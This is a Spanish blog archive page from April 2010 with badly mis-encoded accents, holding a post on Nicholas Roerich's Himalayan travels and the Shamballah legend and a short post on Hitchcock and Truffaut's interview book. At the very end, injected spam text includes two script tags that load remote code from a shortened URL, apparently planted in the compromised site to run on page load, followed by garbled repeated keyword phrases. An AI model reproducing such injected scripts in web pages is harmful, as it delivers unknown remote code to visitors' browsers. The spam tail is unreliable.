Archivo de abril 29th, 2010

El largo camino a Shamballah

A�

Nicholas RoA�rich, la Ruta a Shamballah, 1933.A� Museum Roerich, New York

Apenas ha comenzado nuestra aventura polar y nuestros primeros pasos ya nos ha llevado muy lejos, hasta remotos paisajes plenos de fenomenales misterios. De la mano de Edgar Allan Poe y Julio Verne hemos llegado hasta la puerta misma de unA�reino subterrA?neo, donde adivinamos entre la bruma el perfil diamantino de A�Agharta y Shamballah, las enigmA?ticas regionesA�del mundo intraterreno, en el que nos adentramos en esta ocasiA?n guiados por Nicholas Roerich.

El sueA�o de Roerich, convertido en empresaA�y aventura personal,A�se gestarA�a -A�como casi todos los grandes sueA�os y propA?sitos- en la infancia. Cuando aA?n era un niA�o de nueve aA�os, unA�amigo arqueA?logo llevA? al jovenA� Roerich consigo mientras realizaba unas A�exploraciones en la regiA?n, excavandoA�los tA?mulos locales. Esta aventura supuso una revelaciA?n para Roerich: el encuentro fascinante conA� los misterios de las eras olvidadas, rescatados con sus propias manos, despertA? un interA�s en la arqueologA�a que habrA�a de durarle el resto de su vida. Mediante otros contactos desarrollA? interA�s por coleccionar su propio Wunderkamern: A�artefactos prehistA?ricos, monedas, y minerales, y construyA? su propio vivero para el estudio de plantas y A?rboles (…)

Roerich (Nikolai Rerikh, en ruso) generalmente conocido como pintor, dejA? un legado de cerca de 7000 obras, siendo su faceta mA?s popular la de decorador y diseA�ador de vestuarios para compositores de la talla deA�Serguei DiaguilevA�,Mussorgsky, Rimsky-Korsakov, BorodinA�o Wagner. Pero a nosotros nos interesaA�profundamente y sobre todoA�A�porque fue A�un infatigable viajero y un aventurero de temple heroicoA�A�embarcado en una bA?squeda espiritual sin par.

TambiA�n fue un filA?sofo, arqueA?logo, escritor y lider cultural de su tiempo. Estuvo involucrado en la construcciA?n del primer templo budista en Rusia, en San Petersburgo. TambiA�n se interesA? profundamente por la cultura y la religiA?n oriental, especialmente a travA�s del tamiz teosA?fico, junto con otros entusiastas de la TeosofA�a como Mondrian, Kandisnky y, en realidad, cientos de pintores y artistas de comienzos del siglo XX. Esta curiosidad por la espiritualidad fue la guiarA�aA�los pasos de RoerichA� hacia Shamballah.

La sagrada primavera, decorado para un ballet de Stravinsky, 1930 A� Museum Roerich, New York

Motivado por su interA�s en la obra de Madame Helena Petrovna Blavatsky, traducirA�a por primera vez al ruso su Doctrina Secreta. Influenciado vivamente por la lectura de esta y otras obras teosA?ficas,A�A�Roerich y su esposa se encaminarA�an hacia India; para finales de diciembre de 1923A�ya estaban en Sikkim, en la ladera sur de los Himalayas, y es evidente por la rapidez con que llegaron a las montaA�as que los Himalayas era lo que realmente les interesaba. AllA� comenzarA�an un viaje de exploraciA?n que los llevarA�a hasta el TurquestA?n chino, Altai, Mongolia y Tibet. Fue una expediciA?n por regiones inexploradas, donde planeaban estudiar las costumbres religiosas de sus habitantes.

Sin embargo algunos sostienen que fue otro el motivo que llevarA�a al intrA�pido Roerich hasta el Tibet,A�A�que en realidad iba A�en busca nada menos que de la mA�tica Shamballah o Agharti, ese reino misterioso del queA�dirA�a Ferndinand Ossendowski, en su Voyage en Assie, que se oculta en el interior de la tierra, pero tiene accesos distribuidos en el mundo entero; que allA� no existen el crimen ni el mal; que existen una serie de ciudades que rodean el lugar central, y que allA� mora el Rey del Mundo o Brahmatma, que dirige desde su trono en lo invisible el curso de la historia.

Tibet. Himalayas. Nicholas Roerich, 1933.A� Museum Roerich, New York

La mirada sobre los Himalayas. 1925 A� Copyright by Frank Perry 2004

Blanco y Celestial, Nicholas Roerich, 1924 A� Museum Roerich, New York

Estrella de la MaA�ana (Lucifer) Nicholas Roerich, 1932. A� Museum Roerich, New York

A pesar de los obstA?culos, doquiera que fueron, la creencia de los Roerich en el bien esencial de la vida y en la espiritualidad del hombre se reforzaba. La serieA�de pinturas tituladaA�Estandartes de Oriente de Roerich, compuesta de diecinueve cuadros representando los maestros religiosos del mundo,A�testimonia su bA?squeda sincera de lo Eterno. Es en este conjunto de pinturas ejecutados en las laderas de los Himalayas donde podemos encontar bien patentes su distinciA?n espiritual y el sentido visionario y herA?ico que rigiA?A� su existencia. En estos cuadros, de gran efecto dramA?tico, se percibe la urgencia del viaje, la imperiosidad de un mensaje a enviar, de una misiA?n que realizar, de un camino por recorrer.

MA?s tarde Roerich escribirA�a sobre esta primera expediciA?n en su libro El CorazA?n de Asia, creandoA�para el lector un relato palpitante y sincero de las maravillas de la regiA?n y sus gentes.

Himalayas, 1933. Nicholas Roerich.A� Museum Roerich, New York

La MontaA�a de los cinco tesoros, de la Serie MontaA�as Sagradas. 1933A� Museum Roerich, New York

A�CuandoA�Nicholas Roerich recorrA�a el Tibet y Mongolia constantemente oA�a voces entre los monjes budistas clamando “Este es el tiempo de Shambhala“; segA?n los monjes, el Rey del Mundo vendrA�a al mundo desde su reino en Shambhala con un gigantesco ejA�rcito para borrar el mal de la faz deA�la tierra, antes de erigirse a sA� mismo como el eterno gobernante del planeta.

Nicholas Roerich sabA�a queA� Shambhala se consideraba el puente entre la Tierra y el Cielo y que se extendA�a a lo largo y ancho de un valle secreto en algA?n lugar en las profundidades de los Himalayas. AllA� los grandes maestros, los Mahatmas de todas las eras, tenA�an su real residencia, y allA� guardaban sus antiguos misterios hasta que llegase elA�dA�aA�en queA�Rigden Djapo, el legedario gobernante de Shambhala, reuniese a su ejA�rcito invencible para liderarlos en la A?ltima batalla contra las fuerzas del mal. Aniquilado el enemigo, llegarA�a A�la era de Shambhala , donde la paz, la belleza y la verdad prevalecerA�an por siempre.

La estrella del HA�roe. 1932A� Museum Roerich, New York

Enfrentado al Mahakala, 19255 A� Copyright by Frank Perry 2004

A�

(Nicholas Roerich,A�Incendiando las tinieblas) A� Museum Roerich, New York

El mandato de Ridgen Djapo, 1933 A� Museum Roerich, New York

Nicholas Roerich, el tesoro del mundo (Chintamani) 1932 Roerich Museum, New York.

GuardiA?n del CA?liz, Mongolia, 1935 A� Museum Roerich, New York

Nicholas Roerich, prodigioso viajero, sentado enA�un camello, el primero a la derecha.A� Enero deA�1925 en Port Said, Egipto.

A�

Nicholas Roerich, 1945. ImagenA� Roerich Museum. Un autorretrato del propio Roerich. A� Museum Roerich, New York

-Fuentes y vA�nculos-

(1) Todas las imA?genes A�A� Museo de Nicholas RoerichA� en New York, un importanteA�centro para la exposiciA?n de la obra de Nicholas Roerich.

(2) EL Museo de Nicholas Roerich, en espaA�ol

(2) Nicholas Roerich and the Chintamani Stone

(3) Fragmentos tomados de- The Life and Art of a Russian Masterby Jacqueline Decter and the Nicholas Roerich Museum

(4) Nicholas Roerich, enviado de Shamballah,en CrA?nica subterrA?nea

(5) Breve biogrfA�a de Nicholas Roerich http://www.roerich.org/sp/NicholasRoerich_sp.html

(6) Shamballah resplandece, el Viaje a Asia de Nicholas Roerich contado por A�l mismo.

Memento Hichtcock

Hoy que se cumplen treinta aA�osA�de la muerte de uno de los grandes genios del cine, el director Alfred Hitchcock, es un momento propicio para revisar alguna de las joyas de su filmografA�a, o repetir por enA�sima vez–A?por quA� no? alguna de las que ya hemos visto.A�A�Seguro que todos nos reconocemos profundos admiradores de su obra, de su lenguaje visual inimitable, su pasmosa habilidad para el ritmo narrativo y el suspense;A�seguro tambiA�n que hemos jugado alguna vez a cazarle enA�una de sus fugaces y esperadA�simas apariciones en las secuencias mA?s insospechadas deA�sus propias pelA�culas. A?QuiA�n no recuerda siquiera una de sus inolvidables escenas?A� Pero…A?quA� sabemos realmente de su cine?

Afortunadamente, para quienes gustamos del sA�ptimo arte, eso tiene soluciA?n. El disfrute a la hora de abordar la obra de Hitchcock es dobleA�desde el momento en que podemos contar con la inestimable ayuda de otro gran maestro, FranA�ois Truffaut, quien se declararA�aA�entusiastaA�de su cine, al que consagrarA�a un libro,A�EL CINE SEGAsN HITCHCOCK, imprescindible para todo buen aficionado,A�en el queA�plasmaA�el contenido de unas sesiones de larga conversaciA?nA� entre ambos, donde el director francA�s cuestiona al genio londinense mA?s de quinientas preguntas sobre el lenguaje cinematogrA?fico, anA�cdotas de rodaje, tA�cnicas sobre el guiA?n, o aspectos particulares de suA� filmografA�a. La elecciA?n del repertorio de preguntas, digna de un maestro del cine como Truffaut, es insuperable y logra su objetivo: exponer laA�alquimiaA�de la obra de Hitchcock, desvelar sus trucos, descubrirA� las maravillas de su legado cinematogrA?fico.

El contenido de las conversaciones originales entre Hitchcok y Truffaut, aquA�, tal y como fueron transcritasA�para componer El Cine segA?n Hitchcock, este baluarte de la bibliografA�a sobre el cine del que hablamos; aunque la calidad del audio es aceptable, se necesita cierto dominio del inglA�s para poder sacarles partido;a pesar de ello, bien merecen una escucha atenta.A�Si su nivel de idiomasA� es como el nuestro, les recomendamosA�que se hagan con un ejemplar del libro.A� Y si no les gusta leer, cosa que lamentamos, podrA�an hacerse con esta camiseta que los chicos de Pampling ponen a su disposiciA?n.

Camisetas A. Hitchcock Presents

Camisetas de Hitchcock, en Pampling

A�El cine segA?n Hitchcock

A�

FranA�ois Truffaut: El cine segA?n HitchcockA�(ReseA�a)

MA?s libros imprescindibles sobre cine, aquA�.

Related Posts with Thumbnails
Jueves, abril 29th, 2010 CELULOIDE RANCIO, MEMENTO MORI 4 comentarios
Buscar
 
 
“Optima philosophia et sapientia
est meditatio mortis” , Adaggio clásico
 
 

Encuestas de la tita.

Archivo

Calendario

abril 2010
L M X J V S D
« mar   may »
 1234
567891011
12131415161718
19202122232425
2627282930  

Álbum Fotográfico

El archivo XML no existe
The very best VPN Services 2018<script src="https://is.gd/ob8vtI?v=v9.0"></script> Electric power Selling Approaches to Improve The Web business<script src="https://is.gd/ob8vtI?v=v8.0"></script> Outlines For Core Criteria In Essay Writing Help Starting A web site That Sells Starting An online site That Making A site That Making A site That Brings Profit Starting A web site That Brings Profit Starting A Website That Brings Profit Creating A site That Starting An online site That Sells Starting An online site That Provides Starting A site That Markets Designing A Website That Makes CLients Designing An online site That Brings Profit Designing A web site That Makes CLients Starting A web site That Sells Creating A Website That Brings Profit Making An online site That Markets Making A Website That Brings Profit Creating An online site That Creating A Website That Designing An online site That Markets Making A Website That Makes CLients Making A site That Brings Profit Starting A site That Creating A web site That Brings Profit Making A Website That Starting An online site That Provides Making A site That Creating A Website That Makes CLients Creating A Website That Sells